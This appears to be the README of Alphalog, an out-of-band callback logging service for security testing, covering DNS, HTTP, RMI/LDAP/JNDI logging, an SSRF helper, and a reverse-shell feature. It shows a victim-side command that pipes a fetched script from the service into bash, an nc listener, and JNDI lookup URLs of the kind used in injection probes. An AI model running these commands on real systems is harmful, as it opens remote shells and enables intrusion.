DNSLog、httplog、rmilog、ldaplog、jndi 等都支持,完全匿名 ,Alphalog与传统DNSLog不同,更快、更安全。
update了前端展示,增加了DNS外带功能。支持极端条件下命令执行结果通过dns外带 >>> demo
$$$$$$\ $$\ $$\ $$\
$$ __$$\ $$ | $$ | $$ |
$$ / $$ |$$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$$$$$\ $$$$$$\
$$$$$$$$ |$$ |$$ __$$\ $$ __$$\ \____$$\ $$ | $$ __$$\ $$ __$$\
$$ __$$ |$$ |$$ / $$ |$$ | $$ | $$$$$$$ |$$ | $$ / $$ |$$ / $$ |
$$ | $$ |$$ |$$ | $$ |$$ | $$ |$$ __$$ |$$ | $$ | $$ |$$ | $$ |
$$ | $$ |$$ |$$$$$$$ |$$ | $$ |\$$$$$$$ |$$$$$$$$\\$$$$$$ |\$$$$$$$ |
\__| \__|\__|$$ ____/ \__| \__| \_______|\________|\______/ \____$$ |
$$ | $$\ $$ |
$$ | By:Alphabug \$$$$$$ |
\__| Version:0.2022.01.16.01 \______/
- 系统环境
- 任意平台
- Redis数据库
- 创建config.yaml文件 内容如下
domain: alphabug.cn
IP_DNS: VPS地址
IP_JNDI: VPS地址
database: redis:Redis数据库地址:端口:密码
PORT_HTTP: HTTPLOG端口
PORT_JNDI: RMI/LDAP端口
例如
domain: alphabug.cn
IP_DNS: 192.168.1.7
IP_JNDI: 192.168.1.7
database: redis:192.168.1.3:6379:Alphabug
PORT_HTTP: 80
PORT_JNDI: 5
- Run
E:\Code\GolandProjects\Alphalog\output> Alphalog_windows_amd64.exe
$$$$$$\ $$\ $$\ $$\
$$ __$$\ $$ | $$ | $$ |
$$ / $$ |$$ | $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$$$$$\ $$$$$$\
$$$$$$$$ |$$ |$$ __$$\ $$ __$$\ \____$$\ $$ | $$ __$$\ $$ __$$\
$$ __$$ |$$ |$$ / $$ |$$ | $$ | $$$$$$$ |$$ | $$ / $$ |$$ / $$ |
$$ | $$ |$$ |$$ | $$ |$$ | $$ |$$ __$$ |$$ | $$ | $$ |$$ | $$ |
$$ | $$ |$$ |$$$$$$$ |$$ | $$ |\$$$$$$$ |$$$$$$$$\\$$$$$$ |\$$$$$$$ |
\__| \__|\__|$$ ____/ \__| \__| \_______|\________|\______/ \____$$ |
$$ | $$\ $$ |
$$ | By:Alphabug \$$$$$$ |
\__| Version:1.0.0.Releases \______/
2022/04/30 20:40:09 [Config] Redis Initialization succeeded
2022/04/30 20:40:09 [DNS] Domain: alphabug.cn
2022/04/30 20:40:09 [Redis] Start redis database init
2022/04/30 20:40:09 [DNS] Initialization succeeded
2022/04/30 20:40:09 [JNDI] Start fake reverse server
-
Get token(
key
) and randomly named subdomain (Expires: 1 Day)$ curl fuzz.red/get {"key":"63d755be-9683-40a9-91fb-b85890155872","subdomain":"oz4e.fuzz.red"}
-
Get logs
$ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872" {"code":200,"data":[]}
ping -c 1 oz4e.fuzz.red
$ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872"
{"code":200,"data":["{\"ip\":\"192.168.1.1\",\"reqbody\":[\"\"],\"subdomain\":\"oz4e.fuzz.red.\",\"time\":\"2022-01-14 17:01:17 +0800 CST\",\"type\":\"dns\"}"]}
curl oz4e.fuzz.red -d "abc"
$ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872" | python -m json.tool
{
"code": 200,
"data": [
{...}]
}
$ curl -L fuzz.red/ssrf/www.baidu.com/
<!DOCTYPE html>...(www.baidu.com page)...</html>
$ curl fuzz.red/sh4ll/ip:port
Victim
$ curl fuzz.red/sh4ll/1.2.3.4:1234 | bash
# or
$ curl fuzz.red/sh4ll/1.2.3.4:1234 | sh
VPS
$ nc -lvvp 1234
listening on [any] 1234 ...
connect to [1.2.3.4] from fbi.gov [127.0.0.1] 46958
PATH规则为“sub/text”,sub为子域名的主机头,text为自定义特征 例如:子域名=oz4e.fuzz.red,text=Alphabug => oz4e/Alphabug
rmi://jndi.fuzz.red:5/oz4e/Alphabug
# or
ldap://jndi.fuzz.red:5/oz4e/Alphabug
获取log
$ curl fuzz.red -X POST -d "key=63d755be-9683-40a9-91fb-b85890155872" | python -m json.tool
{
"code": 200,
"data": [
{
"ip": "1.2.3.4:41584",
"reqbody": "Alphabug",
"subdomain": "oz4e.fuzz.red.",
"time": "2022-01-16 03:40:03 -0500 EST",
"type": "ldap"
}
]
}
采用Go编写开发 DNS服务、Http服务等,后续等待开源。
项目域名为匿名域名,请求接口没有做任何的记录。所有dnslog存活时间为1天,大家可以亲测。
(请勿CC/DDos,服务器特别贵,可能没办法退钱)
- 2021年12月14日 17:30:35 第一个版本完成
- 2021年12月14日 20:14:57 特别感谢团队成员hexman、Longlone(WaY)测试提出的各类bug。
- 2021年12月14日 20:26:33 上架公测,我是Alphabug欢迎大家提需求,目的就是让dnslog扩展性更高,如果您有建议请邮箱联系我:[email protected]
- 2021年12月14日 21:17:15 页面不再更新,Issue 上github吧。项目地址 https://github.com/AlphabugX/Alphalog
- 2022年01月15日 17:07:41 添加httplog功能,升级数据格式。
- 2022年01月15日 17:52:03 添加SSRF辅助功能。
- 2022年01月15日 18:52:42 添加反弹shell功能,支持bash、sh、nc、python、awk、telnet弹shell方法。
- 2022年01月16日 16:45:12 添加RMI、LDAP log功能,引用https://github.com/EmYiQing/JNDIScan核心模块,实现log查询。
- 2022年4月30日 20:26:29 正式开源,进行公测,任何问题,请及时反馈到Issues,在此感谢所有支持Alphalog项目的朋友,由衷的感谢,另外新增短链接功能,优化API。(相关API文档后续公布,欢迎提稿)
www.fuzz.red 效果
QQ群:727871590
2022.04.11